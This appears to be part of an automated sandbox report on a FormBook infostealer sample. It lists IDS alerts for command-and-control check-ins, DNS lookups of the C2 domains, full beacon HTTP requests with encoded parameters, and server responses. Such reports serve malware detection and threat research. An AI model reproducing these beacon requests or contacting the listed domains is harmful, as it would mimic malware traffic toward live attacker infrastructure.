Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50039 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50063 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50063 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50060 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50052 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50048 -> 104.21.77.71:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50051 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 154.208.202.225:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50041 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50041 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50045 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50045 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50040 -> 208.91.197.27:80
Source: DNS query | www.aziziyeescortg.xyz
Source: DNS query | www.54248711.xyz
Source: Joe Sandbox View | IP Address: 209.74.77.107
Source: Joe Sandbox View | IP Address: 172.67.129.38
Source: Joe Sandbox View | ASN Name: ACPCA
Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View | ASN Name: COGENT-174US
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.7261ltajbc.bondConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kkpmoneysocial.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.artkub.netConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.happyjam.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.123hellodrive.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zoomlive.liveConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dietcoffee.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /v2ut/?NVK8=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLbDhgs8DELm8MllGE9YflG7OlToR8O0B4KwAawBiq2KURdg==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.guacamask.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /2pcx/?NVK8=WvMwIEBZ0GXEfEVGpcmqJr8xhaJ22fvMS8l3C/jH9UlzXoFcq8ozyiMxUW2Crv9xh6g9FMonHDW5wf9fDGMh/a7sRXpo9EZKPLBX7XcfSv3IAkyUxscM38Xc6L1z4gDQDA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aziziyeescortg.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.supernutra01.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.54248711.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /zmax/?NVK8=c4BENRMdvExsGH0SBTpe30rq6PgBdYYINfe+1MbqTEgo+clVhexpavqEdWzY6VY2Bf1XKclHU3L+/KXqkFrj6MgG392Vu6gwiCPkGxCor7quDyVMbfsrwMj3Ae4U3nGzRw==&V6T=lB24KzN0lF-8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bagatowcannabis.cloudConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | DNS traffic detected: DNS query: www.7261ltajbc.bond
                Source: global traffic | DNS traffic detected: DNS query: www.muasamgiare.click
                Source: global traffic | DNS traffic detected: DNS query: www.kkpmoneysocial.top
                Source: global traffic | DNS traffic detected: DNS query: www.artkub.net
                Source: global traffic | DNS traffic detected: DNS query: www.happyjam.life
                Source: global traffic | DNS traffic detected: DNS query: www.123hellodrive.shop
                Source: global traffic | DNS traffic detected: DNS query: www.zoomlive.live
                Source: global traffic | DNS traffic detected: DNS query: www.dietcoffee.online
                Source: global traffic | DNS traffic detected: DNS query: www.guacamask.online
                Source: global traffic | DNS traffic detected: DNS query: www.appsolucao.shop
                Source: global traffic | DNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.supernutra01.online
                Source: global traffic | DNS traffic detected: DNS query: www.54248711.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.bagatowcannabis.cloud
                Source: unknown | HTTP traffic detected: POST /bsye/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Host: www.muasamgiare.click | Cache-Control: max-age=0 | Content-Type: application/x-www-form-urlencoded | Content-Length: 205 | Connection: close | Origin: http://www.muasamgiare.click | Referer: http://www.muasamgiare.click/bsye/ | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:51:04 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:51:07 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:51:09 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:51:12 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 503 Service Unavailable | Server: nginx | Date: Sat, 14 Dec 2024 12:55:43 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Sat, 14 Dec 2024 12:51:51 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Sat, 14 Dec 2024 12:51:54 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Sat, 14 Dec 2024 12:51:57 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Sat, 14 Dec 2024 12:51:59 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 203 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:52:37 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 | Pragma: no-cache | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha9DQOfp5C7NH0AQiLSigswdBUpueIuDV2Lk8mdy58rGmre%2Blp3%2BUyVgnGnTRM6szHLHF7Bqzu5dwsv1Dzoxey%2BNEYFzhfv%2BOzzy8zxrIa9FokncBRthqreJPx2PWDuKakCId0mHBkzL"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f1e5504ac0943d6-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2299&min_rtt=2299&rtt_var=1149&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:52:40 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 | Pragma: no-cache | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPboVlbiIlEiJ77EtGBwuLEPniM%2F9ip%2FaeDZzihrM5c6us%2ByOZAjVBM%2FCuszW6Y3%2B2URMDwYkcIwgSPp6sgLoaibstA0%2FYDU4cBeKEFjNCmjp9aP2rJPrs9Vw7dOhz7L0hZgNKMKCd5x"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f1e551539ba0f71-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:52:42 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 | Pragma: no-cache | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PsuVWMpeJZU9m6kSLOWms1e%2FnnocvBiyxkHoNuL7UhvQ753nQNNZLrtXlm5vjsTae21MMXrhWjYvVWa1ssF9AN0D78IGA1RQuHFY5F6VXZpQ1P4RdPXf8FqVPfd952jtEyhfiSt62X7"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f1e5525eae743bd-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2202&min_rtt=2202&rtt_var=1101&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 14 Dec 2024 12:52:45 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 | Pragma: no-cache | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LHSWhAitLfHUaKY6Xkk5cCil0gL%2FBmUyPy53VhpBB1gnMpoLM3ziuZpe8%2FjZtSbhommSqt4khoUpxgVpvOD4XdQa5ED4s64EqvxU%2FPFygzN0tMf7TPjsFIkuYAjmkZXCxBDXZijRVm3c"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f1e55369e1e41e1-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="t
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Sat, 14 Dec 2024 12:53:12 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Sat, 14 Dec 2024 12:53:15 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
